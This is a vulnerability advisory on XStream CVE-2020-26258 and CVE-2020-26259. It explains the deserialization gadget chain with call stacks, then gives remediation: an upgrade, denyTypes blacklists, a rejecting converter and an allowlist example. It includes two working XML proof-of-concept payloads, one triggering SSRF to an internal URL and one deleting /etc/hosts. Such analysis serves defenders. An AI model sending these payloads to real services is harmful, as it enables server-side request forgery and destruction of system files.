[CVE-2020-26258/26259] XStream arbitrary file deletion / SSRF vulnerabilities


Vulnerability details

CVE-2020-26259:
Arbitrary file deletion.

Details

When XStream converts a Map, it takes each entry and puts it into the map, which computes the hash of the Map key:
Here the key is of type jdk.nashorn.internal.objects.NativeString, so its hashCode method is invoked.
In the hashCode method of NativeString (C:\Program Files\Java\jdk1.8.0_172\jre\lib\ext\nashorn.jar!\jdk\nashorn\internal\objects\NativeString) the following is called:

<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>

that is, the toString method of the class specified there,
where the InputStream is

<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>

the class type specified here.
Its close method triggers the file deletion:
Partial call stack:

close:145, ReadAllStream$FileStream (com.sun.xml.internal.ws.util)
get:183, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

In the get method of com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data, the close method of the InputStream (here the specified com.sun.xml.internal.ws.util.ReadAllStream$FileStream) is called, and this particular InputStream deletes its "temporary file" inside close, which yields arbitrary file deletion.

CVE-2020-26258:
SSRF

Details

The same chain (MapConverter -> HashMap.put -> NativeString.hashCode -> Base64Data.toString -> Base64Data.get) ends in javax.activation.URLDataSource.getInputStream, which opens the URL supplied in the XML. Call stack:

getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

PoC

[CVE-2020-26258] SSRF

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://localhost:8080/internal/:</url>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

[CVE-2020-26259] Arbitrary file deletion

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
              <tempFile>/etc/hosts</tempFile>
            </is>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

Remediation

Upgrade to version 1.4.15; download link:

https://x-stream.github.io/changes.html#1.4.15

Temporary mitigation
Users of versions below 1.4.15 can configure a blacklist with the code for their version:

  • Users of XStream 1.4.14 only need to add two lines to their XStream setup code:
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • Users of XStream 1.4.13 only need to add three lines to their XStream setup code:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • Users of XStream 1.4.7 to 1.4.12 need to set several blacklists:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
  • Users of XStream 1.4.6 or lower can register their own Converter to prevent deserialization of the currently known harmful Java types:
// Imports required by the converter below:
import java.lang.reflect.Proxy;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.converters.ConversionException;
import com.thoughtworks.xstream.converters.Converter;
import com.thoughtworks.xstream.converters.MarshallingContext;
import com.thoughtworks.xstream.converters.UnmarshallingContext;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;

xstream.registerConverter(new Converter() {
  // Claim every known-dangerous type (the same set the 1.4.7-1.4.12 blacklist above denies)
  // so that marshal/unmarshal below reject it.
  public boolean canConvert(Class type) {
    return type != null && (type.getName().equals("javax.imageio.ImageIO$ContainsFilter")
      || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
      || type == java.lang.ProcessBuilder.class
      || type == java.beans.EventHandler.class
      || type == java.lang.Void.class
      || type == void.class
      || Proxy.isProxy(type)
      || type.getName().startsWith("javax.crypto.")
      || type.getName().endsWith("$LazyIterator")
      || type.getName().endsWith(".ReadAllStream$FileStream"));
  }

  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }

  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }
  // PRIORITY_LOW places this converter above the reflection fallback converter
  // that would otherwise instantiate these types.
}, XStream.PRIORITY_LOW);
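As an added example (not part of the original post or of XStream's own code), the following Java setup replaces the blacklist approach above with an allowlist, using the type-permission API XStream has shipped since 1.4.7; the application type `Greeting` and the trimmed map payload are assumed and constructed for this demo.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;
import java.util.HashMap;
import java.util.Map;

public class XStreamAllowlistDemo {
    // Hypothetical application type that the service legitimately deserializes.
    public static class Greeting {
        public String text;
    }

    // Builds an XStream instance that refuses every type not explicitly allowed, so
    // gadget classes such as NativeString or ReadAllStream$FileStream need no blacklist entry.
    public static XStream hardenedXStream() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // clears all default permissions
        xstream.addPermission(NullPermission.NULL);                // <null/>
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // primitives and their wrappers
        xstream.allowTypes(new Class[]{ String.class, Map.class, HashMap.class, Greeting.class });
        xstream.alias("greeting", Greeting.class);
        return xstream;
    }

    // Constructed input shaped like the PoCs above: a map whose key is a NativeString.
    // The nested dataSource is omitted because the type check fires on the key's class
    // name before any child element is instantiated.
    static final String FORBIDDEN_KEY_XML =
        "<map><entry>"
        + "<jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
        + "</jdk.nashorn.internal.objects.NativeString>"
        + "<string>test</string></entry></map>";

    public static void main(String[] args) {
        XStream xstream = hardenedXStream();
        // Legitimate input still round-trips.
        Greeting g = (Greeting) xstream.fromXML("<greeting><text>hi</text></greeting>");
        System.out.println("accepted: " + g.text);
        // The chain is cut at key type resolution, before HashMap.put and NativeString.hashCode.
        try {
            xstream.fromXML(FORBIDDEN_KEY_XML);
            System.out.println("UNEXPECTED: payload accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

With an allowlist, every new gadget class is rejected by default, so the configuration does not need updating each time another chain like the two above is published.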

References

This component's fix for the vulnerabilities is also blacklist-based; will it end up in the same situation as fastjson?
